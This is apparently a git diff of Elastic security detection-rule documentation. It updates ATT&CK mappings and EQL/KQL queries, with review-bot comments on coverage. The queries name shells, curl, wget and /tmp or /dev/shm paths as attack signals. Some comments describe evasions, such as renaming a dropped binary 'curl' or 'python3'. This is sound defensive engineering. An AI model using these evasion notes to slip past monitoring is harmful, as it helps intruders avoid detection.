OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -89,3 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc index 1ad03e568d..30d21bf559 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc @@ -29,7 +29,7 @@ This rule identifies a sequence of 100 file extension rename events within a set * Tactic: Impact * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: 
@@ -43,18 +43,12 @@ This rule identifies a sequence of 100 file extension rename events within a set [source, js] ---------------------------------- -sequence by host.id, process.entity_id with maxspan=1s +sequence by process.entity_id, host.id with maxspan=1s [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" - and ((process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "openssl")) or - (process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*"))) and + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and file.path : ( "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", - "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*") and not (( - process.name : ( - "dpkg", "yum", "dnf", "rpm", "dockerd", "go", "java", "pip*", "python*", "node", "containerd", "php", "p4d", - "conda", "chrome", "imap", "cmake", "firefox", "semanage", "semodule", "ansible-galaxy", "fc-cache", "jammy", "git", - "systemsettings", "vmis-launcher")) or file.path : "/etc/selinux/*" or (file.extension in ("qmlc", "txt") - ))] with runs=25 + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc index 01be81ba4b..05958029bb 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc 
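Review bot: the suspicious-file-changes-activity-detected query still ends with `with runs=25`, while the hunk context line says the rule "identifies a sequence of 100 file extension rename events"; one of the two numbers is wrong. The rewrite also drops the branch that matched renames by the shell interpreters and `openssl` regardless of path, so a script run as `bash encrypt.sh` from a home directory, or an `openssl` loop, no longer fires unless the binary itself lives under /tmp, /dev/shm and the other listed paths; that narrowing is what makes the long `dpkg`/`yum`/`python` exclusion list removable, but it is a coverage trade-off the changelog should state. Swapping `host.id, process.entity_id` to `process.entity_id, host.id` in `sequence by` changes nothing.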
@@ -36,7 +36,7 @@ Detects the manual creation of files in specific etc directories, via user root, * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc index 8c28f696cc..51f51c26fe 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc @@ -33,10 +33,11 @@ Identifies a suspicious image load (taskschd.dll) from Microsoft Office processe * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -75,3 +76,19 @@ any where host.os.type == "windows" and ** Name: Scheduled Task/Job ** ID: T1053 ** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc index fec92009d8..ce9dd0079c 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc @@ -28,10 +28,11 @@ Identifies the creation of a suspicious ImagePath value. This could be an indica * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -68,3 +69,11 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc index be2379bb1b..c0fe63ae3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc @@ -3,7 +3,7 @@ Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -39,7 +39,7 @@ Identifies suspicious child processes of the Java interpreter process. This may * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 105 +*Version*: 205 *Rule authors*: 
@@ -88,9 +88,9 @@ This rule identifies a suspicious child process of the Java interpreter process. [source, js] ---------------------------------- -process where event.type in ("start", "process_started") and - process.parent.name : "java" and - process.name : ("sh", "bash", "dash", "ksh", "tcsh", "zsh", "curl", "wget") +event.category:process and event.type:("start" or "process_started") and process.parent.name:"java" and process.name:( + "sh" or "bash" or "dash" or "ksh" or "tcsh" or "zsh" or "curl" or "wget" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc index f259239835..47de203f54 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc @@ -33,7 +33,7 @@ Identifies a suspicious managed code hosting process which could indicate code i * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -52,7 +52,7 @@ sequence by process.entity_id with maxspan=5m process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] [file where host.os.type == "windows" and event.type != "deletion" and file.name : ("wscript.exe.log", - "cscript.exe", + "cscript.exe.log", "mshta.exe.log", "wmic.exe.log", "svchost.exe.log", diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc index 8578c3a3e4..64d442a637 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc 
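Review bot: the `"cscript.exe"` to `"cscript.exe.log"` correction in suspicious-managed-code-hosting-process is a detection fix rather than a cosmetic one: the old value could never match a `.log` file creation in that list, so `cscript.exe` hosting managed code was silently uncovered; call that out in the release notes so users understand why the rule starts alerting after the update.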
+++ b/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc @@ -31,7 +31,7 @@ Identifies service creation events of common mining services, possibly indicatin * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc index aadab7dc89..16616a49a1 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc @@ -3,7 +3,7 @@ Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -29,7 +29,7 @@ Detects file events involving kernel modules in modprobe configuration files, wh * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: 
@@ -70,12 +70,8 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action == "opened-file" and -file.path : ("/etc/modprobe.conf", "/etc/modprobe.d", "/etc/modprobe.d/*") and not -( - process.name in ("auditbeat", "kmod", "modprobe", "lsmod", "insmod", "modinfo", "rmmod", "dpkg", "cp", "mkinitramfs", - "readlink") or process.title : "*grep*" or process.parent.pid == 1 -) +host.os.type:linux and event.category:file and event.action:"opened-file" and +file.path : ("/etc/modprobe.conf" or "/etc/modprobe.d" or /etc/modprobe.d/*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc index 88dc28a7a2..b2c3e4ba93 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc @@ -32,12 +32,13 @@ Identifies suspicious child processes of frequently targeted Microsoft Office ap * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access -* Resources: Investigation Guide +* Tactic: Defense Evasion * Tactic: Execution +* Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
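Review bot: in the new suspicious-modprobe-file-event KQL, the list `("/etc/modprobe.conf" or "/etc/modprobe.d" or /etc/modprobe.d/*)` mixes quoted literals with an unquoted wildcard; leaving the wildcard unquoted is what makes it match as a wildcard in KQL, but it reads like a typo, so a comment would help. More important, the EQL exclusion list (`kmod`, `modprobe`, `lsmod`, `insmod`, `dpkg`, `mkinitramfs`, `*grep*`, parent pid 1) is gone and nothing in the hunk replaces it; with a new_terms rule every first sighting of those tools per host becomes an alert, so either keep the exclusions in KQL form or state the new-terms fields and history window that are meant to absorb them.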
@@ -139,6 +140,18 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ * Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: ** Name: Windows Command Shell ** ID: T1059.003 ** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc index 434e5f7a3e..838351fc28 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc @@ -30,11 +30,13 @@ Identifies suspicious child processes of Microsoft Outlook. These child processe * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -128,3 +130,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Attachment ** ID: T1566.001 ** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc index 8e630f0eff..cfa72f579d 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc @@ -1,7 +1,7 @@ [[suspicious-net-code-compilation]] === Suspicious .NET Code Compilation -Identifies suspicious .NET code execution. connections. +Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. *Rule type*: eql @@ -30,10 +30,11 @@ Identifies suspicious .NET code execution. connections. * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -75,3 +76,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Compile After Delivery ** ID: T1027.004 ** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc index e422ed0581..b4aa2ce08b 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc @@ -30,10 +30,11 @@ Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerSh * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -136,6 +137,10 @@ event.category:process and host.os.type:windows and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ +* Technique: ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ 
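Review bot: in the Suspicious .NET Reflection via PowerShell hunks, `Tactic: Execution` is added to the tags but the framework hunk only inserts T1620 Reflective Code Loading under Defense Evasion; no Execution (TA0002) block appears anywhere in this diff for that page. If the Execution block already exists below the hunk context, fine; otherwise add it (TA0002 with T1059.001 PowerShell, as the .NET Code Compilation page in this same diff does) so the tag list and the framework section agree, since the tag is what users filter on and the framework section is what the ATT&CK coverage view reads.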
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc index 9b00e1955f..b9f7f3df12 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc @@ -34,7 +34,7 @@ This rule monitors for network connectivity to the internet from a previously un * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: 
@@ -48,64 +48,23 @@ This rule monitors for network connectivity to the internet from a previously un [source, js] ---------------------------------- -host.os.type:linux and event.category:network and -event.action:(connection_attempted or ipv4_connection_attempt_event) and -process.executable : ( - (/etc/crontab or - /etc/rc.local or - /boot/* or - /dev/shm/* or - /etc/cron.*/* or - /etc/init.d/* or - /etc/rc*.d/* or - /etc/update-motd.d/* or - /home/*/.* or - /run/* or - /srv/* or - /tmp/* or - /usr/lib/update-notifier/* or - /var/tmp/*) and - not (/usr/bin/apt or - /usr/bin/curl or - /usr/bin/dnf or - /usr/bin/dockerd or - /usr/bin/dpkg or - /usr/bin/rpm or - /usr/bin/wget or - /usr/bin/yum) - ) -and source.ip : ( - 10.0.0.0/8 or - 127.0.0.0/8 or - 172.16.0.0/12 or - 192.168.0.0/16) and - not destination.ip : ( - 10.0.0.0/8 or - 100.64.0.0/10 or - 127.0.0.0/8 or - 169.254.0.0/16 or - 172.16.0.0/12 or - 192.0.0.0/24 or - 192.0.0.0/29 or - 192.0.0.10/32 or - 192.0.0.170/32 or - 192.0.0.171/32 or - 192.0.0.8/32 or - 192.0.0.9/32 or - 192.0.2.0/24 or - 192.168.0.0/16 or - 192.175.48.0/24 or - 192.31.196.0/24 or - 192.52.193.0/24 or - 192.88.99.0/24 or - 198.18.0.0/15 or - 198.51.100.0/24 or - 203.0.113.0/24 or - 224.0.0.0/4 or - 240.0.0.0/4 or - "::1" or - "FE80::/10" or - "FF00::/8") +host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and +process.executable:( + (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or + /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/* + ) and not (/tmp/newroot/* or /tmp/snap.rootfs*) + ) and +source.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and +not process.name:( + apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or + saml2aws or wget or yum or ansible* or aws* or 
php* or pip* or python* or steam* or terraform* +) and +not destination.ip:( + 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or + 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or + 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or + 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or "::1" or "FE80::/10" or "FF00::/8" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc index 5cb4b81eda..6aa012cea8 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc @@ -30,11 +30,12 @@ Identifies suspicious child processes of PDF reader applications. These child pr * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Initial Access * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
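Review bot: in the Suspicious Network Activity to the Internet by Previously Unknown Executable query hunk, the allowlist moves from full executable paths (`/usr/bin/curl`, `/usr/bin/wget`, `/usr/bin/apt`, ...) to bare `process.name` values with prefix wildcards (`python*`, `php*`, `aws*`, `ansible*`, `terraform*`, `steam*`), which an attacker who has already dropped a binary into /tmp or /dev/shm defeats by naming it `python3` or `curl`. Since the include clause is path-based, keep the exclusions path-based too (`not process.executable:(/usr/bin/curl or /usr/bin/wget or ...)`), or at minimum pair each name with a trusted directory. Two further points: the new `./*` entry only matches if `process.executable` is ever recorded as a relative path, so either document that this is the intent or treat it as dead; and the `/tmp/newroot/*` and `/tmp/snap.rootfs*` exclusions are exactly the kind of paths malware could choose, so the page text should call them out as tuning exceptions rather than leaving them unexplained in the query.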
@@ -125,6 +126,18 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: -** Name: User Execution -** ID: T1204 -** Reference URL: https://attack.mitre.org/techniques/T1204/ +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc index 9ba95212ed..3a1d6cebba 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc @@ -30,10 +30,11 @@ Detects the presence of a portable executable (PE) in a PowerShell script by loo * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -132,3 +133,11 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ 
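Review bot: in the Suspicious PDF Reader Child Process framework hunk, replacing T1204 User Execution with T1203 Exploitation for Client Execution narrows the mapping: a child process of a reader is at least as often the result of a user clicking through a launch-action prompt (T1204.002 Malicious File) as of an exploit, and the Spearphishing Attachment entry added in the same hunk presumes that user-driven path. Keep T1204.002 alongside T1203 rather than swapping one for the other. In the Suspicious Portable Executable Encoded in PowerShell Script hunk, T1055 Process Injection asserts what the script does with the embedded PE, which the rule cannot see; per its own description the rule only detects the presence of a PE in the script, so T1027 Obfuscated Files or Information is the mapping the query actually supports.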
diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc index e9847b8113..76ccaf8038 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc @@ -29,7 +29,7 @@ This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and e * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -69,9 +69,10 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -host.os.type : "linux" and event.category : "file" and event.action : "opened-file" and -file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : "pidof" and -not process.parent.pid : 1 +host.os.type:linux and event.category:file and event.action:"opened-file" and +file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : ( + ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status +) and not process.parent.pid : 1 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc index fb237482da..6bdcaa5ed0 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc 
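Review bot: in the Suspicious /proc Pseudo File System Enumeration query hunk, `landscape-sysin` reads like a typo but is the 15-character, comm-truncated name that auditd reports for landscape-sysinfo (the setup text says this rule runs on the auditd manager integration). KQL has no comment syntax, so add a sentence to the page saying this is deliberate, otherwise the next editor will "fix" it to `landscape-sysinfo` and reintroduce the noise. Also worth stating on the page: the exclusion is now a name-only allowlist (`ps`, `netstat`, `w`, `pgrep`, `pidof`, `needrestart`, `apparmor_status`), so an enumeration tool renamed to `ps` bypasses it; acceptable for a BBR rule, but readers building higher-order rules on top of it should know.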
@@ -31,10 +31,11 @@ Identifies suspicious process access events from an unknown memory region. Endpo * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Sysmon Only -*Version*: 208 +*Version*: 209 *Rule authors*: @@ -141,3 +142,11 @@ process where host.os.type == "windows" and event.code == "10" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc index 4a9f8def15..8c34c1744c 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc @@ -30,11 +30,12 @@ Identifies suspicious psexec activity which is executing from the psexec service * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -104,3 +105,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Service Execution ** ID: T1569.002 ** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc index 7329f4d48c..5ad53a0c21 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc @@ -34,7 +34,7 @@ Message of the day (MOTD) is the message that is presented to the user when a us * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -106,6 +106,7 